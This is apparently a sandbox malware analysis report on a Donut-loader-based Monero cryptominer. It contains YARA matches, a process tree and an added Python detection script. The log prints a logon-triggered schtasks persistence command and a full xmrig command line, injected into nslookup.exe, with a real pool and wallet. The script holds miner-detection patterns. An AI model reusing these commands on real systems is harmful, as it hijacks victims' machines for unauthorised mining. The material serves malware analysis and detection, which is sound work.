Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2022-01-13
Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@26/5@1/1
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\IOAshdohSha.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
Source: boooba.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\boooba.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: boooba.exe ReversingLabs: Detection: 71%
Source: nslookup.exe String found in binary or memory: id-cmc-addExtensions
Source: nslookup.exe String found in binary or memory: set-addPolicy
Source: unknown Process created: C:\Users\user\Desktop\boooba.exe "C:\Users\user\Desktop\boooba.exe"
Source: C:\Users\user\Desktop\boooba.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: unknown Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Users\user\IOAshdohSha.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Users\user\Desktop\boooba.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe" Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64" Jump to behavior
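The process tree above is the whole story of this sample in a few lines: boooba.exe starts conhost.exe with its own path as argument and injects the loader into it, that conhost.exe then spawns cmd.exe (for schtasks), sihost64.exe and finally nslookup.exe, into which the xmrig payload is written so the miner runs under a Microsoft binary name. A genuine console host appears in the same tree (conhost.exe 0xffffffff -ForceV1, started by cmd.exe) and must not be confused with the injected ones. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks process-creation records constructed from the tree above (the three field names are an assumption of the example; the parent of boooba.exe is not shown in the report and is left empty), separates legitimate conhost.exe command lines from abnormal ones, flags any child of conhost.exe, and pulls pool and wallet out of an xmrig-style command line regardless of the image it hides under.

```python
"""Triage of process-creation records for a LOLBin-hosted miner.

Added example for this report, not Joe Sandbox output and not code from the
sample. SAMPLE_RECORDS is constructed from the process tree in the report
(image, parent image, command line, roughly Sysmon Event ID 1 fields); the
parent of boooba.exe is not shown in the report and is left empty here.
"""
import re

# Flags xmrig and its forks accept. Two or more on one command line is a
# strong hint, whatever image name the miner was injected into.
XMRIG_FLAGS = ("--algo", "--url=", "--user=", "--pass", "--randomx",
               "--cpu-max-threads-hint", "--donate-level", "--cuda-", "--opencl")
# Standard Monero address: 95 base58 characters, first one 4 (primary) or 8 (subaddress).
MONERO_ADDR = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
POOL_URL = re.compile(r"--url=(?:stratum\+(?:ssl|tcp)://)?([A-Za-z0-9.-]+):(\d{2,5})")
# A console host started by the console subsystem gets a hex handle value,
# optionally followed by -ForceV1, or the newer --headless form. A file path or
# any other token as argument means something else started conhost.exe as a
# hollowing target. Heuristic: baseline it in your environment before alerting.
CONHOST_LEGIT = re.compile(
    r'^"?\S*conhost\.exe"?\s+(0x[0-9a-fA-F]+(\s+-ForceV1)?|--headless\b.*)\s*$', re.I)

SAMPLE_RECORDS = [  # constructed from the report's process tree
    {"image": r"C:\Users\user\Desktop\boooba.exe", "parent_image": "",
     "command_line": r'"C:\Users\user\Desktop\boooba.exe"'},
    {"image": r"C:\Windows\System32\conhost.exe", "parent_image": r"C:\Users\user\Desktop\boooba.exe",
     "command_line": r'"C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\conhost.exe",
     "command_line": r'"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"'},
    {"image": r"C:\Windows\System32\conhost.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},  # the genuine console host
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"'},
    {"image": r"C:\Windows\System32\nslookup.exe", "parent_image": r"C:\Windows\System32\conhost.exe",
     "command_line": r'C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto '
                     r'--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 '
                     r'--cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 '
                     r'--user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG '
                     r'--pass= --cpu-max-threads-hint=100'},
    {"image": r"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe",
     "parent_image": r"C:\Windows\System32\conhost.exe",
     "command_line": r'"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"'},
    {"image": r"C:\Windows\System32\conhost.exe",
     "parent_image": r"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe",
     "command_line": r'"C:\Windows\System32\conhost.exe" "/sihost64"'},
]


def _basename(path):
    """Lower-case file name of a Windows path, tolerating forward slashes and quotes."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(records):
    """Return a list of findings, each {'rule', 'image', 'detail'}."""
    findings = []
    for rec in records:
        image, parent, cmdline = _basename(rec["image"]), _basename(rec["parent_image"]), rec["command_line"]
        if image == "conhost.exe" and not CONHOST_LEGIT.match(cmdline):
            findings.append({"rule": "conhost_abnormal_args", "image": rec["image"], "detail": cmdline})
        if parent == "conhost.exe":
            # A real console host never spawns children; cmd.exe, nslookup.exe and
            # sihost64.exe below conhost.exe mean the parent is running injected code.
            findings.append({"rule": "child_of_conhost", "image": rec["image"], "detail": rec["parent_image"]})
        hits = [f for f in XMRIG_FLAGS if f in cmdline]
        if len(hits) >= 2:
            pool, wallet = POOL_URL.search(cmdline), MONERO_ADDR.search(cmdline)
            findings.append({"rule": "miner_cmdline", "image": rec["image"], "detail": {
                "flags": hits,
                "pool": (pool.group(1), int(pool.group(2))) if pool else None,
                "wallet": wallet.group(0) if wallet else None}})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding["rule"], "|", finding["image"], "|", finding["detail"])
```

To run this over real telemetry, map Sysmon Image/ParentImage/CommandLine (or 4688 NewProcessName/ParentProcessName/CommandLine) onto the three fields. The miner rule is robust because the xmrig argument set is stable across forks; the conhost.exe rules are the environment-sensitive part and are worth a baseline run before they page anyone.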
Source: C:\Users\user\Desktop\boooba.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: nlaapi.dll Jump to behavior
